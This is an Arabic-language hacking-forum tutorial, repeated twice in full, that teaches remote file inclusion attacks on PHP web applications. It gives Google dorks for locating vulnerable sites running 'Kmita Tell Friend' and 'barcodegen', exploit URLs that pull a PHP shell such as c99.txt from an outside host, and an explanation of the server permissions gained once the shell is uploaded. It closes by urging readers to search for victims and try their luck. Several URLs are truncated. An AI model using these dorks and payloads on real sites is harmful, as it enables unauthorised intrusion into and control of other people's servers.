نطير علي اي موقع يختص بالثغرات
وليكن الميل ورمـ
www.milw0rm.com
ونشوف لنا ثغرة ريموت فايل انكلود عشان سهله وتطبيقها سهل ومفيد
طيب واحد يسألني يعني ايه ريموت فايل انكلود
remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ
ادراج ملف للتحكم
طيب للتحكم في ايه
اقولك في الموقع اللي عايزين نخترقوا
طيب كويس
نجيب ثغرة نطبق عليها الكلامـ
Dork:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
ايه يا عم الكلام الكتير دا
موش فاهمين حاجه
واحده واحده كدا وقلنا
طيب انا معاكوا نفهمها واحده واحدها
دي ثغرة من نوع ريموت فايل انكلود
موجوده في سكريبت اسموا
" "allinurl:/kmitat/"
طيب الثغرة دي هنستغلها ازاي
اقولكـ نربطـ الثغرة بشيل عشان يقرالناملفات الموقع
طيب ايه هو الشيل
الشيل هو ملف مبرمج بلغة البي اتش بي
مرفوع علي استضافه مجانيه بلغة txt or jpg
طيب كويس وايه فايدة الشيل
بيقرالنا ملفات الموقع ومن خلالوا نقدر نتحكم بالموقع حسب صلاحيتنا
طيب ايه هيا الصلاحيات
الصلاحيات هي حالة المخترق بعد رفع الشيل
يعني الشيل هو اللي بيتحكم في نوع الصلاحيه
اما نوي بدي او يوزر او اباتشي او روت
واحد يقولي يعني بتختلف في نوع الشيل او طريقة رفعوا او اوا
اقولوا لا خالص
الاختلاف في صلاحيتك حسب حماية السيرفر
يعني لو السيرفر حمايتوا ه تلاقي صعوبه في الحصول علي اعلي الصلاحيات
طيب مين اللي بيتحكم بالصلاحيات
الروت او الادمنroot
طيب ايه فايدة معرفة الصلاحيه
عشان تعرف انت هتعمل ايه بالظبط
لان من صلاحيه لصلاحيه تفرق كتير
ممكن يكون ملف عله تصريح
777
رمزة علي الملفات : rwxrwxrwx
رمزة علي المجلدات : drwxrwxrwx
طيب أزاي نعرف ان التصريح دا 777
اقولك نحسبها سوي ونشوف هتيجي ولا لأ
اعلم أولا
r = 4
w = 2
x = 1
rwx rwx rwx "2"
طيب نبدل القيم الي فوق بما يساويها من ارقام
1+2+4=7
1+2+4=7
1+2+4=7
اذا
7 7 7
هو تصريحها
تقدر تعمل اللي انت عايزوا فيه
ممكن يكون مغلق التصريح
ما تقدر تفعل شئ
المهمـ نكمل
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f6/341/
الثغرة اللي معانا
كود:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
دوركـ البحث
اول ما تصمع كلمة دوركـ dork تعرف انواكود بحث
طيب نجي للاستغلال
يعني هنستغل البحث دا ازاي
ونعرف هل الموقع به الثغرة ولا لأ
اول ما تسمع كلمة اكسبلويت
أو
Example:
Expl:
Exploit:
Exploits:
Expl:
تعرف انها كود استغلال
http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?
'طيب نفسر اللي حصل ده
http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغرة
[target]
[site]
[namesite]
[url]
kmitam الاسكريبت المصاب
ممكن تلقاه
/[scripts]/
/[path]/
/[dir]/
/[folder]/
= لادراج الشيل
http://xxx.com/txt?؟
ممكن تلقاه زي كدا
[SHELLURL]
[evil]
[shell]
[yourevil]
[evil_scripts]
[cmd]
[php shell]
شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها
طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ
كود:
http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?
وبكدا تقدر ترفع شيل وانت مطمن
بعض النقاط احب اقولها عشان تقدر تستوعب الشرح
لو عندكـ سكريبت مصاب اسموا
sir silveEer
ولاقيت الاستغلال زي كدا
كود:
http.www.dev.com/silveEer/index.php=shll?
ومعاك موقع مصاب وليكن
www.mo0oka.com/
وعايز ترفع شيل
كويس من النقطه دي
هتاخد الاستغلال
وتضعوا بعد رابط الموقع
كود:
www.mo0oka.com/silveEer/index.php=shll؟
مع العلم ان السكريبت اللي بتبحث عنوا ومصاب بيكون تابع لعنوان الموقع مباشرة
طيب نجيب ثغرة من الميل ورمـ ونطبق عليها
كود:
http://www.milw0rm.com/exploits/6575
شرح الثغرة
Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
# Download From : http://www.barcodephp.com/processdow...1d-php4.v2.0.0
Exploit :
http://WwW.Sec-Code.CoM/barcodegen.1...shell/c99.txt?
طيب اوكـ
Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
السكريبت المصاب بثغرة الفايل انكلود
Download From : http://www.barcodephp.com/processdow...1d-php4.v2.0.0
تم تحميلوا من هذا الموقع
Exploit :
الاستغلال
http://WwW.Sec-Code.CoM/barcodegen.1...shell/c99.txt?
طبعا انا شرحت قبل كتير كيف ندمج الشيل مع الاستغلال
طيب واحد يقولي فين الدورك اللي هبحث بيه في جوجل
رغم اني لا احب الاختراق العشوائي
لكن هذا مثال لتتضح الرؤيه
dork:inurl barcodegen "
dork : powered by barcodegen
وابحث براحتكـ بتلقي مواقع كتير مصابة بالثغرة
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/showthread.php?t=341
وعاد جرب وانت وحظكـ
وليكن الميل ورمـ
www.milw0rm.com
ونشوف لنا ثغرة ريموت فايل انكلود عشان سهله وتطبيقها سهل ومفيد
طيب واحد يسألني يعني ايه ريموت فايل انكلود
remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ
ادراج ملف للتحكم
طيب للتحكم في ايه
اقولك في الموقع اللي عايزين نخترقوا
طيب كويس
نجيب ثغرة نطبق عليها الكلامـ
Dork:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
ايه يا عم الكلام الكتير دا
موش فاهمين حاجه
واحده واحده كدا وقلنا
طيب انا معاكوا نفهمها واحده واحدها
دي ثغرة من نوع ريموت فايل انكلود
موجوده في سكريبت اسموا
" "allinurl:/kmitat/"
طيب الثغرة دي هنستغلها ازاي
اقولكـ نربطـ الثغرة بشيل عشان يقرالناملفات الموقع
طيب ايه هو الشيل
الشيل هو ملف مبرمج بلغة البي اتش بي
مرفوع علي استضافه مجانيه بلغة txt or jpg
طيب كويس وايه فايدة الشيل
بيقرالنا ملفات الموقع ومن خلالوا نقدر نتحكم بالموقع حسب صلاحيتنا
طيب ايه هيا الصلاحيات
الصلاحيات هي حالة المخترق بعد رفع الشيل
يعني الشيل هو اللي بيتحكم في نوع الصلاحيه
اما نوي بدي او يوزر او اباتشي او روت
واحد يقولي يعني بتختلف في نوع الشيل او طريقة رفعوا او اوا
اقولوا لا خالص
الاختلاف في صلاحيتك حسب حماية السيرفر
يعني لو السيرفر حمايتوا ه تلاقي صعوبه في الحصول علي اعلي الصلاحيات
طيب مين اللي بيتحكم بالصلاحيات
الروت او الادمنroot
طيب ايه فايدة معرفة الصلاحيه
عشان تعرف انت هتعمل ايه بالظبط
لان من صلاحيه لصلاحيه تفرق كتير
ممكن يكون ملف عله تصريح
777
رمزة علي الملفات : rwxrwxrwx
رمزة علي المجلدات : drwxrwxrwx
طيب أزاي نعرف ان التصريح دا 777
اقولك نحسبها سوي ونشوف هتيجي ولا لأ
اعلم أولا
r = 4
w = 2
x = 1
rwx rwx rwx "2"
طيب نبدل القيم الي فوق بما يساويها من ارقام
1+2+4=7
1+2+4=7
1+2+4=7
اذا
7 7 7
هو تصريحها
تقدر تعمل اللي انت عايزوا فيه
ممكن يكون مغلق التصريح
ما تقدر تفعل شئ
المهمـ نكمل
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f6/341/
الثغرة اللي معانا
كود:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
دوركـ البحث
اول ما تصمع كلمة دوركـ dork تعرف انواكود بحث
طيب نجي للاستغلال
يعني هنستغل البحث دا ازاي
ونعرف هل الموقع به الثغرة ولا لأ
اول ما تسمع كلمة اكسبلويت
أو
Example:
Expl:
Exploit:
Exploits:
Expl:
تعرف انها كود استغلال
http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?
'طيب نفسر اللي حصل ده
http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغرة
[target]
[site]
[namesite]
[url]
kmitam الاسكريبت المصاب
ممكن تلقاه
/[scripts]/
/[path]/
/[dir]/
/[folder]/
= لادراج الشيل
http://xxx.com/txt?؟
ممكن تلقاه زي كدا
[SHELLURL]
[evil]
[shell]
[yourevil]
[evil_scripts]
[cmd]
[php shell]
شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها
طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ
كود:
http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?
وبكدا تقدر ترفع شيل وانت مطمن
بعض النقاط احب اقولها عشان تقدر تستوعب الشرح
لو عندكـ سكريبت مصاب اسموا
sir silveEer
ولاقيت الاستغلال زي كدا
كود:
http.www.dev.com/silveEer/index.php=shll?
ومعاك موقع مصاب وليكن
www.mo0oka.com/
وعايز ترفع شيل
كويس من النقطه دي
هتاخد الاستغلال
وتضعوا بعد رابط الموقع
كود:
www.mo0oka.com/silveEer/index.php=shll؟
مع العلم ان السكريبت اللي بتبحث عنوا ومصاب بيكون تابع لعنوان الموقع مباشرة
طيب نجيب ثغرة من الميل ورمـ ونطبق عليها
كود:
http://www.milw0rm.com/exploits/6575
شرح الثغرة
Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
# Download From : http://www.barcodephp.com/processdow...1d-php4.v2.0.0
Exploit :
http://WwW.Sec-Code.CoM/barcodegen.1...shell/c99.txt?
طيب اوكـ
Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
السكريبت المصاب بثغرة الفايل انكلود
Download From : http://www.barcodephp.com/processdow...1d-php4.v2.0.0
تم تحميلوا من هذا الموقع
Exploit :
الاستغلال
http://WwW.Sec-Code.CoM/barcodegen.1...shell/c99.txt?
طبعا انا شرحت قبل كتير كيف ندمج الشيل مع الاستغلال
طيب واحد يقولي فين الدورك اللي هبحث بيه في جوجل
رغم اني لا احب الاختراق العشوائي
لكن هذا مثال لتتضح الرؤيه
dork:inurl barcodegen "
dork : powered by barcodegen
وابحث براحتكـ بتلقي مواقع كتير مصابة بالثغرة
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/showthread.php?t=341
وعاد جرب وانت وحظكـ